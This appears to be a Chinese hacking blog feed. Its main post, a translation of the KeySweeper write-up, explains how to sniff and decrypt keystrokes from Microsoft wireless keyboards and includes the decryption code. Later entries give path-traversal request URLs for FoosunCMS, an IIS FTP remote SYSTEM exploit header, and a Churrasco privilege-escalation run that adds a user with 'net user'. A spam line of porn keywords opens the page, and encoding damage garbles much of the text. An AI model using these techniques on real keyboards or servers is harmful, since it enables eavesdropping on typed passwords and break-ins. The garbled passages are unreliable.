亚洲国产成人久久综合一,亚洲一卡2卡4卡5卡6卡在线99,国产av无码专区亚洲av桃花庵

Sniffing Proprietary 2.4GHz Signals

009 — Fri, 08 May 2015 06:12:00 GMT

(U) Sniffing Proprietary 2.4GHz Signals

使用HackRF或者RTL-SDR加变频器�Q�那是极好的�Q�但是我最�l�需要把所有东襉K��打包��C��个小�I�间里面�?/p>

可参考另一个页面：(x��)Travis Goodspeed, 作者不仅嗅探了(ji��n)�c�M��的键�?Microsoft Comfort Desktop 5000), �q�演�C�Z��(ji��n)怎么�?span style="line-height: 25.6000003814697px;">用他的一个叫GoodFET的设备和python的脚�?/span>goodfet.nrf�Q?span style="line-height: 25.6000003814697px;">�?/span>�?nRF24L01+ 芯片嗅探 2.4GHz 的数�?/span>.

Travis发现嗅探该设备存在多个难点，不仅现在需要指定频道（频率�Q�，而且�q�需要指定MAC地址。nRF芯片只提供发送到指定MAC地址的数据包。此外，nRF芯片不会(x��)发送MAC地址数据�Q�因��Z��已经指定�?(�?code style="box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">RX_ADDR_P[0-5]6个管道中的一�?/code>)�?/p>

Travis发现在指定MAC长度的时候，在手册中为SETUP_AW�Q�当讄��?#8216;0’的时候被认�ؓ(f��)是非法的�Q?/span>

'00' - Illegal
'01' - 3 bytes
'10' - 4 bytes
'11' – 5 bytes

但是实际讄��MAC地址��Z��个字节，�q�且把MAC讄��在preamble的位�|?0x00AA or 0x0055, in binary 0000000010101010 or 0000000001010101), ��p��ƺ骗讑֤�在数据部分首先提供完整的MAC地址�l�我们，请参考这��碉堡了(ji��n)�?a style="box-sizing: border-box; color: #4183c4; text-decoration: none; background-image: initial; background-attachment: initial; background-size: initial; background-origin: initial; background-clip: initial; background-position: initial; background-repeat: initial;">文章学习(f��n)具体�l�节�?/p>

(U) Increasing Speed and Portability

虽然现在我们可以使用GoodFET�Q�电(sh��)脑加nRF24L01+来做嗅探��试�Q�但是最�l�我们还是希望能够用一套便宜的嵌入式设备来实现此功能。我们可以��用Travis的研�I�成果，使用在微控制�?嵌入式C�E�序来实现所有功能�?/p>

另外�Q�我们做�?ji��n)一些改�q��?Goodfet.nrf 告诉我们怎样扫描我们惌��监听的设备：(x��)

频率�?2400MHz开�?/li>
讄��数据速率�?1Mbps 以及(qi��ng)MAC�?x00AA�Q�监�?0�U�钟
讄��数据速率�?nbsp;2Mbps 以及(qi��ng)MAC�?x00AA�Q�监�?0�U�钟
讄��数据速率�?nbsp;1Mbps 以及(qi��ng)MAC�?x0055�Q�监�?0�U�钟
讄��数据速率�?nbsp;2Mbps 以及(qi��ng)MAC�?x0055�Q�监�?0�U�钟
逐步增加频率��|��直到2528MHz再返回从2400MHz开始��@�?(128个频率�?
要找��C��个潜在的键盘讑֤��Q�我们需要至��四个包�Q�以满��阈值确保是个合法的数据包，防止误报�?/li>

�q�意味着扫描一个完整的频率范围需要大�U?5分钟�Q?and at least several keystrokes must be pressed while we're sniffing within the correct 10 second period. ) 在仔�l�学�?f��n)�?ji��n)Travis的研�IӞ��KeyKeriki 的项目，以及(qi��ng)��试�?ji��n)我的键盘，我们可以做一些改�q�：(x��)

查阅 FCC�Q�键盘只需要用�?2403 - 2480MHz的范��_(d��)��直接�?28个频率减��到�?8个频�?(节省40%)
所有键盘�(sh��)��?Mbps�Q�又减少一半时间�?/li>
在检查了(ji��n)很多键盘?sh��)��后�Q�我发现所有的微��Y键盘的MAC地址都是�?xCD开始的�Q�因此我们的preamble永远�?code style="line-height: 25.6000003814697px; box-sizing: border-box; font-family: Consolas, 'Liberation Mono', Menlo, Courier, monospace; font-size: 13.6000003814697px; padding: 0.2em 0px; margin: 0px; border-radius: 3px; background-color: rgba(0, 0, 0, 0.0392157);">0xAA (10101010) �Q?nbsp;after inspecting more keyboards, I found that all Microsoft keyboards begin with 0xCD as the MAC, which tells us that our preamble will always be 0xAA (10101010) 因�ؓ(f��)0xAA后面永远跟的�? (0xCD 二进�?11001101)以保持比特位交替�Q�这样又加快�?ji��n)一倍的搜烦(ch��)速度�?/li>
因�ؓ(f��)我们知道MAC地址的第一�?(0xCD), 我们也知道需要什么样的数据包, 我们只需要检查某个确认的数据包，��p��知道�q�是一个我们要扄��键盘讑֤��?/li>
我们把每个频率扫描时间降低到500毫秒�Q�从而把整个扫描一轮的旉��降低�?0�U��?/li>

(U) Decrypting Keystrokes

Thorsten Schröder �?Max Moser 设计�?ji��n)一个碉堡了(ji��n)的东�?nbsp;KeyKeriki, 能够监听微��Y键盘�Q�完全逆向�?ji��n)解密的�q�程�q�且做了(ji��n)个设备能够完全实现这些。然而，他们的设备需要两个无�U�电(sh��)和一个高端微处理器，来捕获和解析�?Mbps通信的键盘设备��生的数据。Travis的项目虽然牛��|��但是需要一台电(sh��)脑主机，而且对于我们�U�密执行��d��Q�这套设备还是太大了(ji��n)�Q�因此我们改�q�了(ji��n)设计�Q�现在只需要一个廉��h��U�电(sh��)和一个微处理器，功耗低而且体积��，不再需要电(sh��)脑和其他无线�?sh��)设备�?/p>

Thorsten �?Max 发现�q�个击键只是使用ECB模式��单的�?span style="line-height: 25.6000003814697px;">MAC地址异或加密 , 我们可以使用Travis的方法利用nRF24L01+来嗅探和获取MAC地址�Q�这�U�加密方法相当于只是把扑克牌切了(ji��n)一�ơ�?/span>

�l�过�q�一步调查发玎ͼ�我们现在知道所有微软键盘的MAC地址都是�?xCD开始的�Q�实际按键（下图��色部分�Q�恰好与MAC地址�W�一个字节对齐，�q�就是说即��我们不知道完整的MAC地址�Q�我们依然能够解密按键消息，因�ؓ(f��)�q�个寚w��是不�?x��)变的，MAC地址开头一个字�?xCD也是不变的�?/p>

�׃��数据包加密部分的长度�?1个字节，而MAC地址�?个字节，CRC校验是每个字节做�Q�异或（加密前）(j��)�Q�你�?x��)发��C��些有意思的事情�Q�由于MAC地址被异或了(ji��n)两次�Q�我们能够在不需要知道完整MAC地址的情况下计算校验��|��q�是因�ؓ(f��)MAC被异或两�ơ，��q��当于什么都没做�Q�而第11个字节又是MAC地址的第一个字节，我们知道�?xCD。根据这个特性我们可以进行一些其他的��d��Q�比如更�Ҏ(gu��)��键和CRC校验�Q�同样不需要知道MAC地址�Q�这��会(x��)在我以后的项目做相关演示�?/p>

KeyKeriki ��目中的一��|��C�Z��(ji��n)解密�q�程�Q?/p>

Device type 0x0A = keyboard, 0x08 = mouse
Packet type 0x78 = keystroke, 0x38 = idle (key is held down)
Model type 0x06 = keyboard? This is the same HID code for a keyboard
HID code 0x05 = letter 'b' (described in section 7 here)

KeySweeper的解密部分代�?

// decrypt those keyboard packets! 
 void decrypt(uint8_t* pkt) 
 { 
     // our encryption key is the 5-byte MAC address and 
     // starts 4 bytes in (4-byte header is unencrypted)
      for (int i = 4; i < 15; i++) 
         pkt[i] ^= mac >> (((i - 4) % 5) * 8) & 0xFF; 
 }

原文�Q?span style="font-family: monospace; font-size: medium; line-height: normal; white-space: pre-wrap;">KeySweeper

009 2015-05-08 14:12 发表评论

打算做个HackRF

009 — Mon, 31 Mar 2014 09:52:00 GMT

摘要:
国外官方�?00��元左右�Q�目前买不到�Q�国内有做的�Q�卖2800人民币，��C��赗��只能自己做�?ji��n)，好几个芯片好贵啊�Q�都上百�?ji��n)�?

阅读全文

009 2014-03-31 17:52 发表评论

使用xgoldmon��目调试监控本机通信

009 — Tue, 11 Mar 2014 11:02:00 GMT

摘要:
支持手机�Q�感觉可以把手机讄��成MODEM模式支持AT命��o(h��)的应该都可以�Q?
- Samsung Galaxy S3 GT-I9300
- Samsung Galaxy Nexus GT-I9250 (has to be rooted!)
- Samsung Galaxy S2 GT-I9100
- Samsung Galaxy Note 2 GT-N7100
。。。。。�?
阅读全文

009 2014-03-11 19:02 发表评论

OsmocomBB��目

009 — Wed, 13 Nov 2013 08:27:00 GMT

摘要:
之前看过好多大牛玩osmocomBB��目�Q�改个手机，�q�电(sh��)脑，然后�~�译一堆东西，到最后都是开个console�Q�满屏红�U�绿�l�的文字滚动�Q�看着很吊�?
但都不说最�l�能�q�啥�Q�滚屏完�?ji��n)就没�?ji��n)�Q�大牛都太低调了(ji��n)�Q�最�q�有朋友也在搞这个，�?ji��n)解了(ji��n)一下，以下描述都是我最�q�查阅的大量鸟文资料�?qi��ng)少量中文资料之后的理解�Q�如有误望指出�?
OsmocomBB是国外一个开源项目，是GSM协议�?Protocols stack)的开源实玎ͼ�全称是Open source mobile communication Baseband.目的是要实现手机端从物理�?layer1)到l(f��)ayer3的三层实现�?
�q�里记录一下过�E�，以便备忘和其它有需要的童鞋��走弯�\�?
........

阅读全文

009 2013-11-13 16:27 发表评论

Raspberry Pi 增加TFT昄��

009 — Tue, 18 Dec 2012 07:21:00 GMT

摘要:
Raspberry Pi是一�Ƒ֟�于Linux�pȝ��的个人电(sh��)脑，配备一�?00MHz的处理器�Q?56内存�Q�支持SD卡和Ethernet�Q�拥有两个USB接口�Q�以�?HDMI和RCA输出支持�?
有消息称�Q�虽然Raspberry Pi看�v来非常的�q�你——只有一张信用卡大小�Q�但是它能够�q�行像《雷��之锤三�Q�竞技场》这��L(f��ng)��游戏和进�?080p视频的播放。但是以�q�次接TFT屏试用结果看�Q�我觉得臛_��SPI是纯属扯J8蛋，可能HDMI速度快点�Q�但是就以那�~�译内核的速度来看�Q��ƈ不乐观�?

... ...
阅读全文

009 2012-12-18 15:21 发表评论

009 — Tue, 23 Oct 2012 09:38:00 GMT

摘要:
每次都重新推��一遍，�q�纪大了(ji��n)�q�是记录一下吧�Q?a href="http://www.tkk7.com/baicker/archive/2011/07/30/355418.html">��g版的TV-B-Gone的压�~�编码蟩�q�此�D�往(xi��n)下看�Q?

N900上有个TVB-Gone的程序，但是�E�序的红外编码往(xi��n)往(xi��n)都是对应的国外的�?sh��)视�Q�好多国产电(sh��)视都不支持，
有时候需要遥控空调或者投�׃��cȝ��Q�只能自己录入了(ji��n)�Q�大概看�?ji��n)一下，�~�码比较��单（比硬仉��个简单多�?ji��n)，毕竟不需要考虑�E�序�I�间的问题）(j��)
�Q�上�ơ录�q�一�ơ，�q�次又重搞一遍，�q�是记录一下，以备后用。）(j��)
。。�?
阅读全文

009 2012-10-23 17:38 发表评论

009 — Fri, 10 Aug 2012 08:21:00 GMT

摘要:
托rock的福�Q�跟风��|�?ji��n)个Raspberry Pi�Q�（破手机照的，�q�可以吧 ^_^�Q�，安装配置如下�Q?
阅读全文

009 2012-08-10 16:21 发表评论

009 — Fri, 18 Feb 2011 18:40:00 GMT

摘要:
一个国外的开源项目，通过截获无线键盘发出的信��P��来监听键盘按键操作，�W�一个版本支持监�?7MHz的无�U�K��盘，�W�二个版本支�?.4G的无�U�K��盘监听及(qi��ng)注入功能�Q�爽�?

以前玩过C51单片机，加上本��n自学能力和手工焊接功底不错，��磕�l�绊几个月下来，�l�于初步完成�?ji��n)这个小玩意�?

�q�次的芯片是ATMEL的MEGA64A�Q�比之前C51�p�d��的又强大、复杂了(ji��n)不少�Q�制作过�E�中遇到非常多的问题�Q�在�q�里鄙视一下（强烈圎ͼ�(j��)国内的知识共享精��?

………�?

阅读全文

009 2011-02-19 02:40 发表评论

遭受 MSN D.o.S

009 — Mon, 14 Jun 2010 14:45:00 GMT

009 2010-06-14 22:45 发表评论

009 — Wed, 11 Nov 2009 15:43:00 GMT

目录更名�Q�新目录不能包含点）(j��)
/User/FileManage.asp?Type=FolderReName&OldFileName=../../FS_Inc&NewFileName=009

目录��览�Q�CurrPath不能包含点）(j��)
/Foosun500/User/CommPages/FolderImageList.asp?CurrPath=/userfiles/&ShowVirtualPath=&f_UserNumber=1210538AD00

创徏目录xxxx�Q�CurrPath不能包含点）(j��)
/User/CommPages/FolderImageList.asp?CurrPath=/userfiles/xxxx&ShowVirtualPath=&f_UserNumber=1210538AD00

009 2009-11-11 23:43 发表评论

009 — Sun, 20 Sep 2009 07:09:00 GMT

摘要:
�l�定4444端口�Q�W(xu��)indows 2000 CN + SP4 ��试通过�Q�需要能建目录的用户�Q�偏�U�d��址若不通用�Q�请自行修改�?
#!/usr/bin/perl
# IIS 5.0 FTP Server / Remote SYSTEM exploit
..................

阅读全文

009 2009-09-20 15:09 发表评论

TRS �Q�文本检索系�l�）(j��)注入

009 — Thu, 10 Sep 2009 07:12:00 GMT

摘要:
TRS 是英文Text Retrieval System�Q�文本检索系�l�）(j��)的羃写，据说是全文检索、搜索引擎、内容管理及(qi��ng)知识��理核心(j��)技术和产品的统一�Q�入�?008�q�度国家规划布局内重点��Y件企业，做某些渗透经�怼�(x��)��到�?
......

阅读全文

009 2009-09-10 15:12 发表评论

Overwrite $_FILE array in rfc1867 - Mime multipart/form-data File Upload

009 — Mon, 27 Jul 2009 03:54:00 GMT

摘要:
鸟文没太看明白，摸烦(ch��)�?ji��n)一下，$_FILE数组元素解析的问题�?
搭个php的环境，目录在C:\www下，根目录下有个upload.php代码如下
......

阅读全文

009 2009-07-27 11:54 发表评论

黑客控制整栋大厦�?sh��)力�pȝ��,改编成游�?

009 — Fri, 06 Feb 2009 15:57:00 GMT

摘要:
�q�才是牛逼黑�?控制整栋大厦�?sh��)力�pȝ��,大厦灯光来做背景,改编成游�?坦克大战~~
.............

阅读全文

009 2009-02-06 23:57 发表评论

以色列�h发现的IE 0day (ZT)

009 — Thu, 08 Jan 2009 11:16:00 GMT

摘要:
��试成功�Q�点打印后，�?x��)弹��(gu��)��?
.........
阅读全文

009 2009-01-08 19:16 发表评论

Token Kidnapping Windows 2003 PoC exploit (Win2K3��试成功)

009 — Thu, 09 Oct 2008 02:52:00 GMT

摘要:
我的有啥补丁打啥补丁的Win2k3 CN SP1��试成功

d:\Churrasco.exe "net user 009 /add"

/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 1948
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 472
.......

阅读全文

009 2008-10-09 10:52 发表评论

009 — Tue, 12 Aug 2008 06:46:00 GMT

摘要:
(之前发的"关于Fs2You怎么才能不被和谐"的文章被和谐掉了(ji��n))
装WordPress��Z��看到�?
默认plugins目录有hello.php文�g�Q�不�q�好像很多插........

阅读全文

009 2008-08-12 14:46 发表评论

Microsoft Office Snapshot Viewer ActiveX Exploit (可执行版)

009 — Mon, 14 Jul 2008 15:07:00 GMT

摘要:
lcx�l�的�Q�网上的都是攑֐�动项�Q�这个可以自动执�?